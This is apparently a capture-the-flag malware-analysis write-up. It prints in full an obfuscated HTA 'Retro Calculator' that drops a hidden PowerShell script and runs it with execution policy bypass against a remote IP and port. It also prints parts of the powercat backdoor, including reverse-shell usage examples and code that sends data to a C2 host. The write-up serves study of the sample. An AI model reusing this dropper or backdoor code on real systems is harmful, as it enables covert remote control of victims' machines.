This challenge provides us with a zip file with the decompression password being PMDK2025
. Providing this password, we get an .hta
file. These type of files are programs that are used in Windows and can contain html, css, Jscript etc.
Opening this file in a text editor, we get the following code:
<HTML>
<HEAD>
<meta charset="UTF-8" http-equiv="X-UA-Compatible" content="IE=9">
<HTA:APPLICATION ID="Retro Calculator" ICON="https://icon-icons.com/downloadimage.php?id=5548&root=39/ICO/128/&file=propagation_calculator_calc_6110.ico" MAXIMIZEBUTTON="no" border="thin" showInTaskbar="yes" innerBorder="no" reseize="no" scroll="no" singleInstance="yes" selection="no" version="1.0" />
<TITLE>Retro Calculator</TITLE>
<style>
.JDVIpnQ3j4p::after {
adfkkwe: "Y0c5M1pYSnphR1ZzYkNBPQ==";
}
.RlC::after {
eoqodke: "YyUUERNTPDM2Qg==";
}
.axca::after {
k94f3d: "MmQ0NTc4NjU2Mzc1NzQ2OTZmNmU1MDZmNmM2OTYzNzkyMDQyNzk3MDYxNzM3MzIw";
}
.KeJwx1Wmxm::after {
k300dw: "SkVWeWNtOXlRV04wYVc5dVVISmxabVZ5Wlc1alpTQTlJQ2RqYjI1MGFXNTFaU2Nn";
}
.a018etre::after {
oc12ss: "YxRdFR8=";
}
.qbFRPpTPX55vBZG::after {
background_image: url("");
}
.MVOWBsb::after {
ek9230: "bn9XWUMEdmdgVm9GeEJbf2YUVAoXbGJsVmFZOhIWPDdA";
}
</style>
</HEAD>
<script language="Jscript">
window.resizeTo(350, 350);
isClear = true;
function insertValue(value) {
if (isClear == true){
document.getElementById("txtDisplay").value = value
isClear = false
} else {
document.getElementById("txtDisplay").value += value
}
}
function clearValue() {
document.getElementById("txtDisplay").value = "0";
isClear = true;
}
function HCCW07y(binp) {
var dm = new ActiveXObject("Microsoft.XMLDOM");
var el = dm.createElement("tmp");
el.dataType = "bin.base64";
el.text = binp;
var b64bytes = el.nodeTypedValue;
var asc = new ActiveXObject("System.Text.ASCIIEncoding");
return asc.GetString(b64bytes);
}
function iW6RQQ6OSHbVzk(inp) {
var a = inp.toString();
var b = '';
for (var n = 0; n < a.length; n += 2) {
b += String.fromCharCode(parseInt(a.substr(n, 2), 16));
}
return b;
}
function M1k(str) {
var z8QN = "NR4yz7XVXbAtIwu";
return str.split('').map(function(c, i) {
return String.fromCharCode(c.charCodeAt(0) ^ z8QN.charCodeAt(i % z8QN.length));
}).join('');
}
function evalStatement() {
document.getElementById("txtDisplay").value = eval(document.getElementById("txtDisplay").value)
try {
var fso = new ActiveXObject("Scripting.FileSystemObject");
var cmd = new ActiveXObject("WScript.Shell");
var tmpDir = cmd.ExpandEnvironmentStrings("%TEMP%");
var filePath = tmpDir + "\\retroCalculator.ps1";
var file = fso.CreateTextFile(filePath, true);
var h5Fz91A7tlixaf = HCCW07y(HCCW07y(window.getComputedStyle(document.querySelector('.JDVIpnQ3j4p'), '::after').adfkkwe.trim().replace(/^["']|["']$/g, "")));
var Fkrh7eE6E = M1k(HCCW07y(window.getComputedStyle(document.querySelector('.RlC'), '::after').eoqodke.trim().replace(/^["']|["']$/g, "")));
var JmzT = iW6RQQ6OSHbVzk(HCCW07y(getComputedStyle(document.querySelector(".axca"), '::after').k94f3d.trim().replace(/^["']|["']$/g, "")));
var MkG6CRSu4B3s4 = HCCW07y(HCCW07y(getComputedStyle(document.querySelector(".KeJwx1Wmxm"), '::after').k300dw.trim().replace(/^["']|["']$/g, "")));
var nMMUBXd = M1k(HCCW07y(getComputedStyle(document.querySelector(".a018etre"), '::after').oc12ss.trim().replace(/^["']|["']$/g, "")));
var gL9b = window.getComputedStyle(document.querySelector(".qbFRPpTPX55vBZG"), '::after').background_image.replace(/^url\(data:image\/png;base64,|[\)]$/g, "").replace(/"$/, "");
file.WriteLine(HCCW07y(HCCW07y(gL9b)));
file.Close();
var Js8zvzi3ecZRk2 = M1k(HCCW07y(getComputedStyle(document.querySelector(".MVOWBsb"), '::after').ek9230.trim().replace(/^["']|["']$/g, "")));
var fxAn8j = h5Fz91A7tlixaf + Fkrh7eE6E + JmzT + MkG6CRSu4B3s4 + nMMUBXd + ' "' + tmpDir + '\\retroCalculator.ps1"' + Js8zvzi3ecZRk2;
cmd.Run(fxAn8j);
} catch (e) {
alert("Error: " + e.message);
}
}
</script>
<BODY>
<div style="text-align: center">
<input type="text" id="txtDisplay" style="font-size: 24px; width: 220px; text-align: right" value="0" /><br /><br />
<input type="button" style="height:50px;width:50px" value="7" onclick="insertValue(this.value)"></input>
<input type="button" style="height:50px;width:50px" value="8" onclick="insertValue(this.value)"></input>
<input type="button" style="height:50px;width:50px" value="9" onclick="insertValue(this.value)"></input>
<input type="button" style="height:50px;width:50px" value="*" onclick="insertValue(this.value)"></input><br />
<input type="button" style="height:50px;width:50px" value="4" onclick="insertValue(this.value)"></input>
<input type="button" style="height:50px;width:50px" value="5" onclick="insertValue(this.value)"></input>
<input type="button" style="height:50px;width:50px" value="6" onclick="insertValue(this.value)"></input>
<input type="button" style="height:50px;width:50px" value="-" onclick="insertValue(this.value)"></input><br />
<input type="button" style="height:50px;width:50px" value="1" onclick="insertValue(this.value)"></input>
<input type="button" style="height:50px;width:50px" value="2" onclick="insertValue(this.value)"></input>
<input type="button" style="height:50px;width:50px" value="3" onclick="insertValue(this.value)"></input>
<input type="button" style="height:50px;width:50px" value="+" onclick="insertValue(this.value)"></input><br />
<input type="button" style="height:50px;width:50px" value="CLR" onclick="clearValue()"></input>
<input type="button" style="height:50px;width:50px" value="0" onclick="insertValue(this.value)"></input>
<input type="button" style="height:50px;width:50px" value="." onclick="insertValue(this.value)"></input>
<input type="button" style="height:50px;width:50px" value="=" onclick="evalStatement()"></input><br />
<!-- Extra functionality of calculator to be developed in the future. Totally legit! -->
<div class="laPKmt xnf9 mvIsMqzAAVQQk dXJP4ZwLl4NIH JDVIpnQ3j4p"></div>
<div class="XPfPDF24stT8 RlC"></div>
<div class="KYPqt0GIH1cxA2 pXYxUuyEx70La DCtgO pdNwh axca"></div>
<div class="MrCKtuuNR40UaK Roq aofU4 KeJwx1Wmxm"></div>
<div class="Q8mFJ8x1OL31E8a JW9j zwmk4TB0s fWoiiaIzh3 a018etre"></div>
<div class="paSXnHClH cqTpnib7NUrH IUwuLskyufhp6Ao rP29 qbFRPpTPX55vBZG"></div>
<div class="mOQdtBVypo U1gwKvpIAl5xCu StVJDPFQH nlSeaKzFbUApZ MVOWBsb"></div>
</div>
</BODY></HTML>
Running the app in a VM, we indeed notice that a powershell window opens and closes instantly, just like the description said:
Looking into the script, we notice that it is obfuscated, meaning that many parts of the script have been written in a hard to read and understand way.
Even if we are confused at first, just like all malicious programs, there will be a part where a command will be executed after its reconstruction. We only have to find this part and instead of executing it, we will print it to see what will actually be run.
We notice that the script is pulling some stored data from the css and decodes them with some Jscript functions that either decode from base64 to UTF8, either from hex to UTF8 or even XOR data with the hardcoded key NR4yz7XVXbAtIwu
.
After the data have been decrypted/decoded, they are being reconstructed with a command that stores them to a variable and then executes that variable:
var fxAn8j = h5Fz91A7tlixaf + Fkrh7eE6E + JmzT + MkG6CRSu4B3s4 + nMMUBXd + ' "' + tmpDir + '\\retroCalculator.ps1"' + Js8zvzi3ecZRk2;
cmd.Run(fxAn8j);
If we change the cmd.Run
to an alert statement, we will actually be viewing the reconstructing command instead of running it:
var fxAn8j = h5Fz91A7tlixaf + Fkrh7eE6E + JmzT + MkG6CRSu4B3s4 + nMMUBXd + ' "' + tmpDir + '\\retroCalculator.ps1"' + Js8zvzi3ecZRk2;
alert(fxAn8j);
Modifying the script like this, we get the following result after running the retro calculator:
So the command that was supposed to be executed is:
powershell -w hidden -ExecutionPolicy Bypass $ErrorActionPreference = 'continue' -File "C:\Users\user\AppData\Local\Temp\retroCalculator.ps1" -c 93.184.215.14 -p 4444 -secret
We can visit either the %tmp%
directory on our machine or decode the base64 code that is stored as an image in the CSS (basically the actually dropped file is disguised as an image inside css). Whatever method we choose to follow, the result we should get is the following:
function powercat
{
param(
[alias("Client")][string]$c="",
[alias("Listen")][switch]$l=$False,
[alias("Port")][Parameter(Position=-1)][string]$p="",
[alias("Execute")][string]$e="",
[alias("ExecutePowershell")][switch]$ep=$False,
[alias("Relay")][string]$r="",
[alias("UDP")][switch]$u=$False,
[alias("dnscat2")][string]$dns="",
[alias("DNSFailureThreshold")][int32]$dnsft=10,
[alias("Timeout")][int32]$t=60,
[Parameter(ValueFromPipeline=$True)][alias("Input")]$i=$null,
[ValidateSet('Host', 'Bytes', 'String')][alias("OutputType")][string]$o="Host",
[alias("OutputFile")][string]$of="",
[alias("Disconnect")][switch]$d=$False,
[alias("Repeater")][switch]$rep=$False,
[alias("GeneratePayload")][switch]$g=$False,
[alias("GenerateEncoded")][switch]$ge=$False,
[alias("Help")][switch]$h=$False
)
############### HELP ###############
$Help = "
powercat - Netcat, The Powershell Version
Github Repository: https://github.com/besimorhino/powercat
This script attempts to implement the features of netcat in a powershell
script. It also contains extra features such as built-in relays, execute
powershell, and a dnscat2 client.
Usage: powercat [-c or -l] [-p port] [options]
-c <ip> Client Mode. Provide the IP of the system you wish to connect to.
If you are using -dns, specify the DNS Server to send queries to.
-l Listen Mode. Start a listener on the port specified by -p.
-p <port> Port. The port to connect to, or the port to listen on.
-e <proc> Execute. Specify the name of the process to start.
-ep Execute Powershell. Start a pseudo powershell session. You can
declare variables and execute commands, but if you try to enter
another shell (nslookup, netsh, cmd, etc.) the shell will hang.
-r <str> Relay. Used for relaying network traffic between two nodes.
Client Relay Format: -r <protocol>:<ip addr>:<port>
Listener Relay Format: -r <protocol>:<port>
DNSCat2 Relay Format: -r dns:<dns server>:<dns port>:<domain>
-u UDP Mode. Send traffic over UDP. Because it's UDP, the client
must send data before the server can respond.
-dns <domain> DNS Mode. Send traffic over the dnscat2 dns covert channel.
Specify the dns server to -c, the dns port to -p, and specify the
domain to this option, -dns. This is only a client.
Get the server here: https://github.com/iagox86/dnscat2
-dnsft <int> DNS Failure Threshold. This is how many bad packets the client can
recieve before exiting. Set to zero when receiving files, and set high
for more stability over the internet.
-t <int> Timeout. The number of seconds to wait before giving up on listening or
connecting. Default: 60
-i <input> Input. Provide data to be sent down the pipe as soon as a connection is
established. Used for moving files. You can provide the path to a file,
a byte array object, or a string. You can also pipe any of those into
powercat, like 'aaaaaa' | powercat -c 10.1.1.1 -p 80
-o <type> Output. Specify how powercat should return information to the console.
Valid options are 'Bytes', 'String', or 'Host'. Default is 'Host'.
-of <path> Output File. Specify the path to a file to write output to.
-d Disconnect. powercat will disconnect after the connection is established
and the input from -i is sent. Used for scanning.
-rep Repeater. powercat will continually restart after it is disconnected.
Used for setting up a persistent server.
-g Generate Payload. Returns a script as a string which will execute the
powercat with the options you have specified. -i, -d, and -rep will not
be incorporated.
-secret Decrypt connection check value using specified key. After decryption, decrypted value is send back to C2 to verify stable connectivity.
-ge Generate Encoded Payload. Does the same as -g, but returns a string which
can be executed in this way: powershell -E <encoded string>
-h Print this help message.
Examples:
Listen on port 8000 and print the output to the console.
powercat -l -p 8000
Connect to 10.1.1.1 port 443, send a shell, and enable verbosity.
powercat -c 10.1.1.1 -p 443 -e cmd -v
Connect to the dnscat2 server on c2.example.com, and send dns queries
to the dns server on 10.1.1.1 port 53.
powercat -c 10.1.1.1 -p 53 -dns c2.example.com
Send a file to 10.1.1.15 port 8000.
powercat -c 10.1.1.15 -p 8000 -i C:\inputfile
Write the data sent to the local listener on port 4444 to C:\outfile
powercat -l -p 4444 -of C:\outfile
Listen on port 8000 and repeatedly server a powershell shell.
powercat -l -p 8000 -ep -rep
Relay traffic coming in on port 8000 over tcp to port 9000 on 10.1.1.1 over tcp.
powercat -l -p 8000 -r tcp:10.1.1.1:9000
Relay traffic coming in on port 8000 over tcp to the dnscat2 server on c2.example.com,
sending queries to 10.1.1.1 port 53.
powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com
"
if($h){return $Help}
############### HELP ###############
############### VALIDATE ARGS ###############
$global:Verbose = $Verbose
if($of -ne ''){$o = 'Bytes'}
if($dns -eq "")
{
if((($c -eq "") -and (!$l)) -or (($c -ne "") -and $l)){return "You must select either client mode (-c) or listen mode (-l)."}
if($p -eq ""){return "Please provide a port number to -p."}
}
if(((($r -ne "") -and ($e -ne "")) -or (($e -ne "") -and ($ep))) -or (($r -ne "") -and ($ep))){return "You can only pick one of these: -e, -ep, -r"}
if(($i -ne $null) -and (($r -ne "") -or ($e -ne ""))){return "-i is not applicable here."}
if($l)
{
$Failure = $False
netstat -na | Select-String LISTENING | % {if(($_.ToString().split(":")[1].split(" ")[0]) -eq $p){Write-Output ("The selected port " + $p + " is already in use.") ; $Failure=$True}}
if($Failure){break}
}
if ($secret)
{
Write-Host "Secret option detected. Starting decryption..."
$base64EncryptedCheck = "cXt2cExiWUUDQQRbBlkOaAIEVAUEAAJoBlkCBlMEaAUEA1toQAcFW1NoAAcHWwJK"
$xorKey = 0x1337
$encryptedBytes = [System.Convert]::FromBase64String($base64EncryptedCheck)
$decryptedBytes = @()
foreach ($byte in $encryptedBytes) {
$decryptedByte = ($byte -bxor $xorKey) % 256
$decryptedBytes += [byte]$decryptedByte
}
$decryptedCheck = [System.Text.Encoding]::UTF8.GetString($decryptedBytes)
if ($c -and $p) {
Write-Host "Connecting to $c on port $p..."
try {
$tcpClient = New-Object System.Net.Sockets.TcpClient($c, $p)
$networkStream = $tcpClient.GetStream()
$writer = New-Object System.IO.StreamWriter($networkStream)
$writer.WriteLine($decryptedCheck)
$writer.Flush()
Write-Host "Sent data to $c:$p"
$writer.Close()
$networkStream.Close()
$tcpClient.Close()
Write-Host "Connection closed."
} catch {
Write-Host "Failed to connect to $c on port $p. Error: $_"
}
} else {
Write-Host "Server IP (-c) and port (-p) must be specified to connect."
}
}
...A lot more of powershell code...
This is an existing tool that is called powercat
and is used as a form of backdoor.
We are interested for the parameter -secret
that is passed to the program as we saw in the alert()
statement. If we go to the corresponding code part where this parameter is being used, we will see the following code:
if ($secret)
{
Write-Host "Secret option detected. Starting decryption..."
$base64EncryptedCheck = "cXt2cExiWUUDQQRbBlkOaAIEVAUEAAJoBlkCBlMEaAUEA1toQAcFW1NoAAcHWwJK"
$xorKey = 0x1337
$encryptedBytes = [System.Convert]::FromBase64String($base64EncryptedCheck)
$decryptedBytes = @()
foreach ($byte in $encryptedBytes) {
$decryptedByte = ($byte -bxor $xorKey) % 256
$decryptedBytes += [byte]$decryptedByte
}
$decryptedCheck = [System.Text.Encoding]::UTF8.GetString($decryptedBytes)
if ($c -and $p) {
Write-Host "Connecting to $c on port $p..."
try {
$tcpClient = New-Object System.Net.Sockets.TcpClient($c, $p)
$networkStream = $tcpClient.GetStream()
$writer = New-Object System.IO.StreamWriter($networkStream)
$writer.WriteLine($decryptedCheck)
$writer.Flush()
Write-Host "Sent data to $c:$p"
$writer.Close()
$networkStream.Close()
$tcpClient.Close()
Write-Host "Connection closed."
} catch {
Write-Host "Failed to connect to $c on port $p. Error: $_"
}
} else {
Write-Host "Server IP (-c) and port (-p) must be specified to connect."
}
}
Based on the documentation of the tool in the start:
-secret Decrypt connection check value using specified key. After decryption, decrypted value is send back to C2 to verify stable connectivity.
Thus, cXt2cExiWUUDQQRbBlkOaAIEVAUEAAJoBlkCBlMEaAUEA1toQAcFW1NoAAcHWwJK
is a variable that is used to make sure that the connection between the C2 and the victims machine is stable.
We see that the program decrypts this variable:
- first decoding from base64
- then decrypting via xor with the key
0x1337
Copying this code to a powershell terminal, we see the decrypted variable which is…the flag:D
(base) PS C:\Users\user> $base64EncryptedCheck = "cXt2cExiWUUDQQRbBlkOaAIEVAUEAAJoBlkCBlMEaAUEA1toQAcFW1NoAAcHWwJK"
$xorKey = 0x1337
$encryptedBytes = [System.Convert]::FromBase64String($base64EncryptedCheck)
$decryptedBytes = @()
foreach ($byte in $encryptedBytes) {
$decryptedByte = ($byte -bxor $xorKey) % 256
$decryptedBytes += [byte]$decryptedByte
}
$decryptedCheck = [System.Text.Encoding]::UTF8.GetString($decryptedBytes)
(base) PS C:\Users\user> $decryptedCheck
FLAG{Unr4v3l1n9_53c2375_1n51d3_234l_w02ld_700l5}
(base) PS C:\Users\user>